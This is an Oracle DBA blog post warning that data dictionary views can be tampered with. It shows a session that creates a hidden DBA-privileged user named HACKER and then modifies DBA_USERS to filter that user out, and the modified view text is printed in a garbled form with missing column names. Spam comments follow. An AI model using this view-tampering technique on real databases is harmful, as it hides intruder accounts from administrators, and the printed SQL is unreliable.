Coskan’s Approach to Oracle

January 29, 2007

What if DBA views are not reliable ??

Filed under: Security — coskan @ 12:13 pm

Suppose that you are the DBA of big Corporate with many DB users.

One day you query the v$session table and you see a username HACKER.

who is this ????

firts you look to toad and see nothing about user HACKER

than you query dba_users

and you see nothing about user HACKER

Where this user come from ??? Why you cant see him ??

Answer is below.
13:04:40 SQL> create user hacker identified by hacker;

User created.

13:05:50 SQL> grant create session to hacker;

Grant succeeded.

13:05:58 SQL> grant dba to hacker;

Grant succeeded.

13:12:33 SQL> select username from dba_users where username=’HACKER’;

no rows selected


13:14:23 SQL> select name from user$ where name = ‘HACKER’;


1 row selected.

The answer can be read between the lines

select, u.user#, u.password, m.status,
decode(u.astatus, 4, u.ltime, 5, u.ltime, 6, u.ltime,
8, u.ltime,9, u.ltime, 10, u.ltime, to_date(NULL)),
decode(u.astatus, 1, u.exptime, 2, u.exptime, 5, u.exptime,
6, u.exptime, 9, u.exptime, 10, u.exptime,
decode(u.ptime, ”, to_date(NULL),
decode(pr.limit#, 2147483647, to_date(NULL),
decode(pr.limit#, 0,
decode(dp.limit#, 2147483647, to_date(NULL), u.ptime +
u.ptime + pr.limit#/86400)))),,, u.ctime,,
nvl(cgm.consumer_group, ‘DEFAULT_CONSUMER_GROUP’),
from sys.user$ u left outer join sys.resource_group_mapping$ cgm
on (cgm.attribute = ‘ORACLE_USER’ and cgm.status = ‘ACTIVE’ and
cgm.value =,
sys.ts$ dts, sys.ts$ tts, sys.profname$ p,
sys.user_astatus_map m, sys.profile$ pr, sys.profile$ dp
where u.datats# = dts.ts#
and u.resource$ = p.profile#
and u.tempts# = tts.ts#
and u.astatus = m.status#
and u.type# = 1
and u.resource$ = pr.profile#
and dp.profile# = 0
and dp.type#=1
and dp.resource#=1
and pr.type# = 1
and pr.resource# = 1
and <> ‘HACKER’

Thanks Steve Callan, for informing us about the situation above.

What i have learned today;

If you want to be a real dba look behind the VIEWS.

Security Comes First

Security First



  1. Wow, amazing blog layout! How long have you been blogging for?
    you made blogging look easy. The overall look of your site is fantastic, let alone the

    Comment by epson printer repair — September 3, 2014 @ 3:21 am

  2. Hiya! I know this is kinda off topic but I’d figured I’d ask.
    Would you be interested in trading links or maybe guest writing
    a blog article or vice-versa? My site goes over a lot of the same
    subjects as yours and I believe we could greatly benefit from
    each other. If you might be interested feel free to shoot me an email.

    I look forward to hearing from you! Wonderful blog by the way!

    Comment by Disc Jockey — September 10, 2014 @ 3:04 pm

  3. wh0cd273532 indocin

    Comment by Michaellex — August 30, 2017 @ 3:34 am


    What if DBA views are not reliable ?? | Coskan’s Approach to Oracle

    Trackback by Online surveys — November 12, 2017 @ 1:51 am

  5. This is the right site for anyone who would like to find out
    about this topic. You realize so much its almost tough to argue with you
    (not that I really would want to…HaHa). You certainly put a brand new spin on a topic which has been discussed
    for many years. Wonderful stuff, just wonderful!

    Comment by share Files — December 30, 2017 @ 1:06 pm

RSS feed for comments on this post. TrackBack URI

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

Create a free website or blog at

%d bloggers like this: